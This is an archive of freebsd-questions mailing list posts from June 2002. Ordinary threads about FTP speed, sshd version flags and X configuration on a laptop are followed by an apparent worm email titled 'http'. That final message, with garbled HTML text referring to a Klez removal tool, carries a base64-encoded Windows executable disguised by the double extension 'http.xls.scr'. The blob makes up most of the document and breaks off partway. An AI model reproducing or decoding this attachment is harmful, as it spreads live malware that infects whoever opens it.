0FAE937B405 for ; Tue, 25 Jun 2002 17:01:54 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by cactus.fi.uba.ar (8.11.6/8.11.6) with ESMTP id g5Q00BP19474; Tue, 25 Jun 2002 21:00:12 -0300 (ART) (envelope-from fgleiser@cactus.fi.uba.ar) Date: Tue, 25 Jun 2002 21:00:11 -0300 (ART) From: Fernando Gleiser X-X-Sender: To: Mindaugas Cc: Subject: Re: question about FTP In-Reply-To: <458423822.20020626014640@delfi.lt> Message-ID: <20020625205733.K403-100000@localhost> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, 26 Jun 2002, Mindaugas wrote: > Hello, > > My computer is connected: WinBOX<--->10MB hub<-->FreeBSDBox > But the speed when I uploading to anon ftp is 60 - 90 kbps and when > I downloading from my ftp speed is 1 - 15 kbps and it seems > sometimes it hangs up. I may be your network interface configuration. Plese post the output of a 'ifconfig -a'. Some cards are known to have problems with autoselect media. Try seting that options manually Fer > network cards are RTL8139 chips both (and winbox and BSDbox) > At first I thought that my BSD box computer ($%&!(####@!!, but I > installed Linux Slackware 8.0 and tryed ftp on it. > i.e. LinuxBox<-->10MB hub<-->Winbox. > The speed was 700 - 900 kbps (I think that is normal 10MB metwork speed) > I tryed ftpd daemon, proftpd standalone,(on BSD) but speed is the > same: 60 - 90 kbps. > What I'm doing wrong??? > may by my KERNEL need some options??? > no firewall, no limitations is installed... the fresh install... > > plz help me... > > -- > Sincerely > Mindaugas mindugas77@delfi.lt > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 17: 8:41 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.speakeasy.net (mail17.speakeasy.net [216.254.0.217]) by hub.freebsd.org (Postfix) with ESMTP id 90C6937B403 for ; Tue, 25 Jun 2002 17:08:36 -0700 (PDT) Received: (qmail 19216 invoked from network); 26 Jun 2002 00:08:35 -0000 Received: from unknown (HELO helios.sr.nextrials.com) ([64.81.74.130]) (envelope-sender ) by mail17.speakeasy.net (qmail-ldap-1.03) with DES-CBC3-SHA encrypted SMTP for ; 26 Jun 2002 00:08:35 -0000 Received: from helios.sr.nextrials.com (jim@localhost.sr.nextrials.com [127.0.0.1]) by helios.sr.nextrials.com (8.12.4/8.12.4) with ESMTP id g5Q08Zk9006740; Tue, 25 Jun 2002 17:08:35 -0700 (PDT) (envelope-from mij@nextrials.com) Received: (from jim@localhost) by helios.sr.nextrials.com (8.12.4/8.12.4/Submit) id g5Q08YQr006739; Tue, 25 Jun 2002 17:08:34 -0700 (PDT) (envelope-from mij@nextrials.com) Date: Tue, 25 Jun 2002 17:08:34 -0700 From: Jim Mock To: "Kevin Kinsey, DaleCo, S.P." Cc: darryl@osborne-ind.com, freebsd-questions@FreeBSD.ORG Subject: Re: How to determine version of SSH Message-ID: <20020626000834.GA303@helios.sr.nextrials.com> Reply-To: mij@nextrials.com References: <002301c21c8f$833d9f30$0701a8c0@darryl> <011601c21c90$69ee79e0$30ec910c@fbccarthage.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <011601c21c90$69ee79e0$30ec910c@fbccarthage.com> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002 at 16:36:48 -0500, Kevin Kinsey, DaleCo, S.P. wrote: > I've seen a little confusion on this. Here's why: > > #sshd -v > sshd: illegal option -- v > sshd version OpenSSH_2.9 FreeBSD localisations 20020307 > Usage: sshd [options] > Options: > -f file Configuration file (default /etc/ssh/sshd_config) > -d Debugging mode (multiple -d means more debugging) > -i Started from inetd > -D Do not fork into daemon mode > -q Quiet (no logging) > -p port Listen on the specified port (default: 22) > -k seconds Regenerate server key every this many seconds (default: 3600) > -g seconds Grace period for authentication (default: 600) > -b bits Size of server RSA key (default: 768 bits) > -h file File from which to read host key (default: > /etc/ssh/ssh_host_key) > -u len Maximum hostname length for utmp recording > -4 Use IPv4 only > -6 Use IPv6 only > > As you can see, you do get a version number. I > wonder why they didn't follow the convention and > write in a "-v" option. They did, but it's -V. - jim -- jim mock http://soupnazi.org/ | jim@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 17:19:49 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cpimssmtpu12.email.msn.com (cpimssmtpu12.email.msn.com [207.46.181.87]) by hub.freebsd.org (Postfix) with ESMTP id F06D337B403 for ; Tue, 25 Jun 2002 17:19:42 -0700 (PDT) Received: from thebe ([67.24.230.81]) by cpimssmtpu12.email.msn.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 25 Jun 2002 17:18:54 -0700 From: "Aaron Burke" To: "Robert L. Bostic" Cc: "FreeBSD-Questions" Subject: RE: Monitor & video configuration on a laptop Date: Tue, 25 Jun 2002 17:18:28 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 In-Reply-To: X-OriginalArrivalTime: 26 Jun 2002 00:18:54.0616 (UTC) FILETIME=[0E612980:01C21CA7] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > > > I successfully installed FreeBSD 4.6 on a Sony PCG-FXA47 laptop. > > > However, I was unable to find a monitor and video card setting > > > that will allow me to startx. Startx fails complaining of being > > > unable to find a usable configuration. After several days of trial > > > and error, I was compelled to give up and conclude that 4.6 has no > > > monitor/video card settings compatible with my laptop. Does anyone > > > know of a work around that I use? Thanks. > > For starters, what is the model number of the video card? Who > > makes it? Also, dont worry about the monitor definition. That is > > generally not a problem at all. > The information you requested is as follows: > > Card model: ATI Rage Mobility-M1 AGP > Ram: 8.00 MB > Driver: ati2drab.dll > Driver version: 6.13.10.5779 > Resolution: 1024x768x60 hertz > Bits/pixel: 32 Fantastic, now we have some info to start looking up. This has now been forwarded to freebsd-questions for now, people with similar hardware should also be able to tell you how they got it working. Also, was this install an upgrade? Did you have an older version of X11 on this box? If this was an install on a new box, try changing to roots home directory and do 'XFree86 -configure'. The machine is going to try and configure several things. When its done, it should tell you how to launch X-Windows with the new config file. > Any assistance that you can render will be greatly appreciated. Thats what some of us are here to do. > > > Robert > > > neozulu@attbi.com Also for reference, some mailers do not automatically reply to all senders. Make sure that the mails also get sent to the mailing list as well. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 17:31: 9 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.FreeBSD.org (ptd-24-198-80-89.maine.rr.com [24.198.80.89]) by hub.freebsd.org (Postfix) with SMTP id 3ACDB37B420 for ; Tue, 25 Jun 2002 17:30:20 -0700 (PDT) From: bookkie To: questions@FreeBSD.org Subject: http Date: Tue,25 Jun 2002 20:30:05 PM X-Mailer: Microsoft Outlook Express 5.50.4133.2400 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=onlqqjc Message-Id: <20020626003020.3ACDB37B420@hub.freebsd.org> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --onlqqjc Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable httpsecurityresponsesymanteccomavcentervencdataw32kleremovaltoolhtml SSS [NormalmHADefault Paragraph FontSSSSUUEastview MotelC\My Documents\httpdocRRxRRSGTimes New Roman5VtbSymbol3ArialheeDrShttpsecurityresponseEastview MotelEastview MotelZOht HT\dlhttpsecurityresponsettpEastview MotelrastNormalw
.
.
More details attached
--onlqqjc Content-Type: application/octet-stream; name=http.xls.scr Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="http.xls.scr" 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 